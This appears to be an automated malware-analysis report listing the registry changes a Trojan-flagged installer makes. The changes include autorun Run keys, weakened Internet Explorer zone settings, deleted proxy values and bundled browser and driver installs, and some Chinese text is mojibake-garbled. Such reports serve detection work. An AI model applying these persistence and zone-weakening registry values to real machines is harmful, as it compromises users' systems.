[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"Inno Setup: Language" = "english"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F 9F BB 5A 0A 41 29 22 1E 41 B9 53 5B 73 BB 4E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"Inno Setup: App Path" = "%Program Files%\baidu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"NoModify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"Inno Setup: Setup Version" = "5.5.5 (a)"
"InstallLocation" = "%Program Files%\baidu\"
"MajorVersion" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"baidu" = "%Program Files%\baidu\BindEx.exe"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The process setup.exe:1304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Amigo]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\32.0.1709.113\Installer\setup.exe"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".webp" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\Startmenu]
"StartMenuInternet" = "Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"DisplayIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"
[HKCR\.shtml\OpenWithProgids]
"AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""
[HKCU\Software\Amigo\Commands\on-os-upgrade]
"CommandLine" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\32.0.1709.113\Installer\setup.exe --on-os-upgrade --verbose-logging"
[HKCR\.webp\OpenWithProgids]
"AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Amigo]
"ap" = "-stage:refreshing_policy"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"tel" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Amigo\Commands\on-os-upgrade]
"AutoRunOnOSUpgrade" = "1"
[HKCU\Software\Mail.Ru\AmigoInstaller]
"AgentInstall" = "0"
"ua" = "CHANNEL_profitraf7"
[HKCU\Software\Classes\CLSID\{A2DF06F9-A21A-44A8-8A99-8B9C84F29161}]
"(Default)" = "CommandExecuteImpl Class"
[HKCU\Software\Amigo]
"pv" = "32.0.1709.113"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Amigo]
"Name" = "Amigo"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".xhtml" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCR\.html\OpenWithProgids]
"AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCR\.htm\OpenWithProgids]
"AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\amigo.exe]
"Path" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".html" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Amigo]
"UninstallArguments" = " --uninstall"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Mail.Ru\AmigoInstaller]
"FirstInstall" = "1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"http" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Mail.Ru\AmigoInstaller]
"InstallResult" = "install"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCR\AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe -- %1"
[HKCR\AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ]
"(Default)" = "HTML Document"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"DisplayVersion" = "32.0.1709.113"
"InstallLocation" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application"
[HKCR\AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"
[HKCR\.xht\OpenWithProgids]
"AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"mms" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities]
"ApplicationName" = "Amigo"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".shtml" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"VersionMajor" = "1709"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"ReinstallCommand" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe --make-default-browser"
[HKCU\Software\Amigo]
"InstallerSuccessLaunchCmdLine" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities]
"ApplicationDescription" = "Amigo is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into Amigo."
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"smsto" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Amigo\Commands\install-extension]
"CommandLine" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe --limited-install-from-webstore=%1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"HideIconsCommand" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe --hide-icons"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"news" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".htm" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\32.0.1709.113\Installer\setup.exe --uninstall"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"IconsVisible" = "1"
[HKCU\Software\Amigo]
"InstallerError" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "28 66 E8 50 43 23 63 4C 80 65 DC FA 7C 6A BA 35"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"InstallDate" = "20141211"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ]
"(Default)" = "Amigo"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"https" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCR\AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ]
"URL Protocol" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Mail.Ru\AmigoInstaller]
"Guid" = "{34AC175C-5D3B-4B71-BDBB-95A9533CD3F6}"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"urn" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Classes\CLSID\{A2DF06F9-A21A-44A8-8A99-8B9C84F29161}\LocalServer32]
"ServerExecutable" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\32.0.1709.113\delegate_execute.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Amigo]
"oopcrashes" = "1"
[HKCU\Software\Mail.Ru\AmigoInstaller]
"stage" = "1"
[HKCR\.xhtml\OpenWithProgids]
"AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""
[HKCU\Software\Amigo\Commands\install-extension]
"WebAccessible" = "1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"mailto" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"irc" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
"nntp" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"Publisher" = "Mail.Ru"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities]
"ApplicationIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"
[HKCU\Software\Amigo]
"InstallerExtraCode1" = "9"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\Default User\Application Data"
[HKCU\Software\Amigo\Commands\install-extension]
"RunAsUser" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\amigo.exe]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"NoModify" = "1"
[HKCU\Software\Amigo]
"InstallerResult" = "0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".xht" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Classes\CLSID\{A2DF06F9-A21A-44A8-8A99-8B9C84F29161}\LocalServer32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\32.0.1709.113\delegate_execute.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"DisplayName" = "Amigo"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"NoRepair" = "1"
"Version" = "32.0.1709.113"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"webcal" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
"ftp" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Amigo]
"lang" = "en"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"ShowIconsCommand" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe --show-icons"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"VersionMinor" = "113"
[HKCU\Software\Amigo\Commands\install-extension]
"SendsPings" = "1"
[HKLM\SOFTWARE\RegisteredApplications]
"Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = "Software\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"sms" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"amigo" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe --no-startup-window"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Amigo]
"ap"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Mail.Ru\AmigoInstaller]
"InstallResult"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKCU\Software\Amigo]
"InstallerExtraCode1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process setup.exe:380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "48 28 E4 65 68 48 74 FE 6B E6 DB 0F C2 1B A4 BC"
The process MsiExec.exe:3808 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A 1C D7 F7 10 45 6B 73 5F F7 74 49 42 96 17 DA"
The process MsiExec.exe:3132 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 E1 AC 99 10 3B DE B5 49 B4 D9 8F 38 D4 8B 76"
The process F1023_s_30768.exe:3512 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Services\bd0002]
"Description" = "bd0002"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Common Files\Baidu\BDDownload\108]
"bddownloader.exe" = "百度高速下载引擎"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"Description" = "BDArKit"
[HKLM\SOFTWARE\Baidu\BaiduSd]
"InstallDate" = "2014-12-11"
"Version" = "2.1.0.3086"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度æÂ€毒]
"DisplayIcon" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\app.ico"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"Type" = "1"
"Group" = "bddriver"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"ImagePath" = "system32\DRIVERS\BDArKit.sys"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\System\CurrentControlSet\Services\bd0002]
"Type" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度æÂ€毒]
"DisplayVersion" = "2.1.0.3086"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\iexplore\AllowedDomains\*]
"(Default)" = ""
[HKLM\System\CurrentControlSet\Services\bd0002]
"ImagePath" = "system32\DRIVERS\bd0002.sys"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp\BDMSkin.dll,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"vendor" = "Beijing baidu Netcom science and technology co.ltd"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin\MimeTypes\application/np-BaiduSDDetect]
"Description" = "BaidusdDetectNPPlugin"
[HKLM\System\CurrentControlSet\Services\bd0001]
"Tag" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Baidu\BaiduSd]
"INSTLANG" = "2052"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度æÂ€毒]
"Publisher" = "百度在线网络技术(åŒâ€â€ÃƒÂ¤Ã‚ºÂ¬Ã¯Â¼â€°Ã¦Å“䎪ÂÂå…¬å¸"
[HKLM\System\CurrentControlSet\Services\bd0002]
"DisplayName" = "bd0002"
[HKLM\System\CurrentControlSet\Services\bd0001]
"Type" = "1"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\System\CurrentControlSet\Services\bd0002]
"ErrorControl" = "0"
[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"ProductName" = "BaiduSd"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Baidu\BaiduSd]
"RtpFlag" = "273"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\System\CurrentControlSet\Services\bd0002]
"Group" = "bddriver"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Services\bd0002]
"Tag" = "2"
[HKLM\SOFTWARE\Baidu\BaiduSd]
"InstallDir" = "%Program Files%\Baidu\BaiduSd"
[HKLM\System\CurrentControlSet\Services\bd0001]
"ImagePath" = "system32\DRIVERS\bd0001.sys"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度æÂ€毒]
"UninstallString" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\uninst.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"DisplayName" = "BDArKit"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"Path" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\explugin\npBaiduSDDetectPlug.dll"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"Tag" = "4"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 9F B5 D1 AD 1E 3E 5A 1C 69 32 68 63 39 B0 28"
[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"Description" = "Baidusd detect NPAPI plugin"
[HKLM\System\CurrentControlSet\Control\ServiceGroupOrder]
